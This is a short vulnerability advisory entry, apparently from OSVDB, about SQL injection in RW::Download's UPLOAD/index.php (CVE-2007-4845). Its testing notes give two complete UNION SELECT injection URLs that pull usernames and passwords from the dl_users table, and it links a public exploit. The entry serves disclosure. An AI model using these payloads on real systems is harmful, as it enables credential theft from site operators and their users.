RW::Download UPLOAD/index.php Multiple Variable SQL Injection

2007-09-07T00:00:00
ID OSVDB:37077
Type osvdb
Reporter OSVDB
Modified 2007-09-07T00:00:00

Description

Manual Testing Notes

http://[target]/UPLOAD/index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/ http://[target]/UPLOAD/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/

References:

Generic Exploit URL: http://www.milw0rm.com/exploits/4371 CVE-2007-4845